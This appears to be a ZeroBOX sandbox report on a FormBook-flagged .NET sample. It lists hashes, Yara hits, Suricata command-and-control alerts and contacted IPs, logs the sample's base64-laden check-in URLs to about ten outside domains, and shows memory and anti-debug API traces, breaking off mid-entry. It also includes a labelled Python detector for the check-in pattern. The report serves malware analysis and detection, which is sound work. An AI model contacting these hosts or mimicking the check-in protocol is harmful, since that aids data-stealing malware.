Summary | ZeroBOX

vbc.exe

Generic Malware, UPX, AntiDebug, PE File, OS Processor Check, PE32, .NET EXE, AntiVM
Category FILE
Machine s1_win7_x6401
Started March 4, 2022, 9:38 a.m.
Completed March 4, 2022, 9:44 a.m.
Size 1.7MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 4e5f33a27001659c1749482ab18fc78c
SHA256 65a142ad779f43ca45b3096c77817f62719432136038b288c85f158e6919d19c
CRC32 48C9048A
ssdeep 49152:lK4DeyprZqm8MmT/p4VGHXXiFzro4mW8wbIBuHukk:EFynJ8J4bk
PDB Path C:\projects\markdig\src\Markdig\obj\Release\net40\Markdig.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check
  • IsPE32 - (no description)
  • Is_DotNET_EXE - (no description)
  • UPX_Zero - UPX packed file

IP Address Status Action
109.68.33.25 Active Moloch
13.250.192.238 Active Moloch
162.43.112.107 Active Moloch
164.124.101.2 Active Moloch
172.67.186.67 Active Moloch
198.54.117.218 Active Moloch
23.192.44.203 Active Moloch
23.227.38.74 Active Moloch
23.230.105.135 Active Moloch
31.214.178.54 Active Moloch
34.102.136.180 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:57471 -> 164.124.101.2:53 2027863 ET INFO Observed DNS Query to .biz TLD Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 31.214.178.54:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 31.214.178.54:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 31.214.178.54:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 172.67.186.67:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 172.67.186.67:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 172.67.186.67:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 23.227.38.74:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 23.227.38.74:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 23.227.38.74:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 198.54.117.218:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 198.54.117.218:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 198.54.117.218:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 23.192.44.203:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 23.192.44.203:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 23.192.44.203:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 162.43.112.107:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 162.43.112.107:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 162.43.112.107:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 23.230.105.135:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 23.230.105.135:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 23.230.105.135:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 13.250.192.238:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 13.250.192.238:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 13.250.192.238:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 109.68.33.25:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 109.68.33.25:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 109.68.33.25:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b6090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b6090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b6090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b63d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b6410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b6410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path C:\projects\markdig\src\Markdig\obj\Release\net40\Markdig.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72fe1194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72eb2ba1
mscorlib+0x320edb @ 0x72190edb
mscorlib+0x355fec @ 0x721c5fec
mscorlib+0x320dca @ 0x72190dca
mscorlib+0x32d54b @ 0x7219d54b
0x23186ab
0x2318d80
0x2317ca0
0x2317880
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72e32652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e4264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72eb1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72eb1737
mscorlib+0x2d3711 @ 0x72143711
mscorlib+0x308f2d @ 0x72178f2d
mscorlib+0x2cb060 @ 0x7213b060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72e32652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e4264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72eb1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72eb1737
mscorlib+0x2d36ad @ 0x721436ad
mscorlib+0x308f2d @ 0x72178f2d
microsoft+0x50c17 @ 0x70090c17
microsoft+0x3f33f @ 0x7007f33f
microsoft+0x3edf8 @ 0x7007edf8
microsoft+0x3e3b9 @ 0x7007e3b9
microsoft+0x17e980 @ 0x701be980
0x6959ec6
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72e32652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e4264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e42e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72ef74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72ef7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f81dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f81e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f81f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f8416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7488f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74907f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74904de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e (CLR managed exception, raised through kernelbase!RaiseException)
exception.offset: 46887
exception.address: 0x760cb727
registers.esp: 2811496
registers.edi: 0
registers.eax: 2811496
registers.ebp: 2811576
registers.edx: 0
registers.ebx: 6316960
registers.esi: 5861056
registers.ecx: 160434084
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET http://www.thebritenseries.com/dgrg/?Ezu=mCr2bk9utMed5cDMXVFdr9iozCQ1cWrktjHHNtCXCtaDPjQXv2li9qhUkXadvBgg4+vsUq2K&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.regitconference.com/dgrg/?Ezu=+jDLkUd/T225prqcYHH/4bFnKlSY/Za47FBItsElel80lJB79oXBde87fNSicjDwwnRfI9aQ&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.absolutenuisance.com/dgrg/?Ezu=01GUhnz4CiZPmAt3ZG8HJGtknkINMYvj6HWv01Tzu78UzROLgg7UaLcave3FmJKHWU9TgqXY&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.whatsappstatus17.com/dgrg/?Ezu=RIWw+B44pB/bs6HEV4KVi+k5e4us7AqCSBHbHQZByUXBW0C43SbbGQjqhG2nHh+UiLQmpWte&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.paijuluntan.com/dgrg/?Ezu=Ytr6b4NyyaACuwDDs0dfqrCNGhxp6wEv8VQAgTuVPpCBOA4gLR2kOHS5wPKhjqDks/cnVNxI&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.camaras.store/dgrg/?Ezu=wNFa0OxVuSrQXGQ4I/vM1XKMyEGzpo34n0hEDi1JOrG3rv708J9y4AImpUm6xJWVlLovEx0M&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.timothykmyers.store/dgrg/?Ezu=rffvGNpIh80pkd2KKwc9kqZB1eaV7z5n/tPDQTuI+pHmBd3q0mMkpIkBhWayC3GL117hcnn5&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.redenyl.com/dgrg/?Ezu=tNlEf6bpc4SGDhfY+7q6/4SG/6QvqElE5GVAfttw+3ngw1pJuB2j4pOadtC1b5Lzfr+XpzhR&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.honeyroux.com/dgrg/?Ezu=McA2z5OcNlI/MUBBsROK4ODs+1W3rvgf3hH4swzPNXydJJUg1fRAJmFCx/zZjqh747eWnlmt&LL3H=Gbtltxj8p
suspicious_features GET method with no useragent header suspicious_request GET http://www.townsvillelawnservice.com/dgrg/?Ezu=81pzn3ogCMRExC3nRzFsjughtEaPXaw9e4lvID+4gVkPgbTsmxIHaXVh0Xfv5eCIXO+d6vQ2&LL3H=Gbtltxj8p
request GET http://www.thebritenseries.com/dgrg/?Ezu=mCr2bk9utMed5cDMXVFdr9iozCQ1cWrktjHHNtCXCtaDPjQXv2li9qhUkXadvBgg4+vsUq2K&LL3H=Gbtltxj8p
request GET http://www.regitconference.com/dgrg/?Ezu=+jDLkUd/T225prqcYHH/4bFnKlSY/Za47FBItsElel80lJB79oXBde87fNSicjDwwnRfI9aQ&LL3H=Gbtltxj8p
request GET http://www.absolutenuisance.com/dgrg/?Ezu=01GUhnz4CiZPmAt3ZG8HJGtknkINMYvj6HWv01Tzu78UzROLgg7UaLcave3FmJKHWU9TgqXY&LL3H=Gbtltxj8p
request GET http://www.whatsappstatus17.com/dgrg/?Ezu=RIWw+B44pB/bs6HEV4KVi+k5e4us7AqCSBHbHQZByUXBW0C43SbbGQjqhG2nHh+UiLQmpWte&LL3H=Gbtltxj8p
request GET http://www.paijuluntan.com/dgrg/?Ezu=Ytr6b4NyyaACuwDDs0dfqrCNGhxp6wEv8VQAgTuVPpCBOA4gLR2kOHS5wPKhjqDks/cnVNxI&LL3H=Gbtltxj8p
request GET http://www.camaras.store/dgrg/?Ezu=wNFa0OxVuSrQXGQ4I/vM1XKMyEGzpo34n0hEDi1JOrG3rv708J9y4AImpUm6xJWVlLovEx0M&LL3H=Gbtltxj8p
request GET http://www.timothykmyers.store/dgrg/?Ezu=rffvGNpIh80pkd2KKwc9kqZB1eaV7z5n/tPDQTuI+pHmBd3q0mMkpIkBhWayC3GL117hcnn5&LL3H=Gbtltxj8p
request GET http://www.redenyl.com/dgrg/?Ezu=tNlEf6bpc4SGDhfY+7q6/4SG/6QvqElE5GVAfttw+3ngw1pJuB2j4pOadtC1b5Lzfr+XpzhR&LL3H=Gbtltxj8p
request GET http://www.honeyroux.com/dgrg/?Ezu=McA2z5OcNlI/MUBBsROK4ODs+1W3rvgf3hH4swzPNXydJJUg1fRAJmFCx/zZjqh747eWnlmt&LL3H=Gbtltxj8p
request GET http://www.townsvillelawnservice.com/dgrg/?Ezu=81pzn3ogCMRExC3nRzFsjughtEaPXaw9e4lvID+4gVkPgbTsmxIHaXVh0Xfv5eCIXO+d6vQ2&LL3H=Gbtltxj8p
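Added example, not part of the ZeroBOX report: a small detector for the check-in pattern visible in the requests above (GET, no User-Agent header, a single short directory, one long base64-like parameter plus one short constant token that is identical across every host). The log below is constructed: three URLs are copied from the report and three benign requests are added for contrast. The path and length thresholds are assumptions tuned to this sample, not a statement of FormBook's published protocol; the shared token across unrelated domains is the campaign-level signal.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed request log: (method, URL, User-Agent or None when the header is
# absent). First three entries are copied from the report; the rest are filler.
SAMPLE_LOG = [
    ("GET", "http://www.thebritenseries.com/dgrg/?Ezu=mCr2bk9utMed5cDMXVFdr9iozCQ1cWrktjHHNtCXCtaDPjQXv2li9qhUkXadvBgg4+vsUq2K&LL3H=Gbtltxj8p", None),
    ("GET", "http://www.regitconference.com/dgrg/?Ezu=+jDLkUd/T225prqcYHH/4bFnKlSY/Za47FBItsElel80lJB79oXBde87fNSicjDwwnRfI9aQ&LL3H=Gbtltxj8p", None),
    ("GET", "http://www.camaras.store/dgrg/?Ezu=wNFa0OxVuSrQXGQ4I/vM1XKMyEGzpo34n0hEDi1JOrG3rv708J9y4AImpUm6xJWVlLovEx0M&LL3H=Gbtltxj8p", None),
    ("GET", "http://www.example.com/search?q=netsh&page=2", "Mozilla/5.0"),
    ("GET", "http://cdn.example.net/abcd/?v=1234&cb=9", "Mozilla/5.0"),
    ("GET", "http://cdn.example.net/abcd/?v=1234&cb=9", None),
]

# Assumed thresholds: one short directory as the whole path, and a payload of
# at least 40 base64 characters (the report's Ezu values are 72 characters).
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")
B64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def parse_query(query):
    """Split the raw query without '+'-to-space decoding: '+' and '/' are
    base64 alphabet characters in the payload, so parse_qsl would mangle it."""
    pairs = []
    for part in query.split("&"):
        if "=" in part:
            k, v = part.split("=", 1)
            pairs.append((k, v))
    return pairs


def is_formbook_like(method, url, user_agent):
    """One request in isolation: GET, no UA, short path, exactly two params of
    which one is a long base64-like blob and the other a short token."""
    if method != "GET" or user_agent is not None:
        return False
    u = urlsplit(url)
    if not PATH_RE.match(u.path):
        return False
    params = parse_query(u.query)
    if len(params) != 2:
        return False
    values = [v for _, v in params]
    longs = [v for v in values if B64ISH.match(v)]
    shorts = [v for v in values if 4 <= len(v) <= 16 and not B64ISH.match(v)]
    return len(longs) == 1 and len(shorts) == 1


def campaign_tokens(log):
    """Group flagged requests by their constant (key, value) token and keep
    only tokens seen on two or more distinct hosts: {token: sorted hosts}."""
    hosts_by_token = defaultdict(set)
    for method, url, ua in log:
        if not is_formbook_like(method, url, ua):
            continue
        u = urlsplit(url)
        for k, v in parse_query(u.query):
            if not B64ISH.match(v):
                hosts_by_token[(k, v)].add(u.hostname)
    return {t: sorted(h) for t, h in hosts_by_token.items() if len(h) >= 2}


if __name__ == "__main__":
    for token, hosts in campaign_tokens(SAMPLE_LOG).items():
        print("token %s=%s shared by %d hosts: %s" % (token[0], token[1], len(hosts), ", ".join(hosts)))
```

Run stand-alone it prints the one shared token (LL3H=Gbtltxj8p) with the three report hosts; the two cdn.example.net requests are rejected because neither carries a long payload, and the one with a User-Agent is rejected before parsing.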
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00320000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00330000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 917504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00670000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00475000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00477000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 573440
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06931000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00467000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00466000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069bd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000
process_handle: 0xffffffff
3221225496 (0xC0000018 STATUS_CONFLICTING_ADDRESSES) 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069be000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069bf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02310000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0232f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02311000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02312000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02321000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02313000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02314000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02315000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02316000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 6
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000
process_handle: 0xffffffff
3221225496 (0xC0000018 STATUS_CONFLICTING_ADDRESSES) 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02317000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
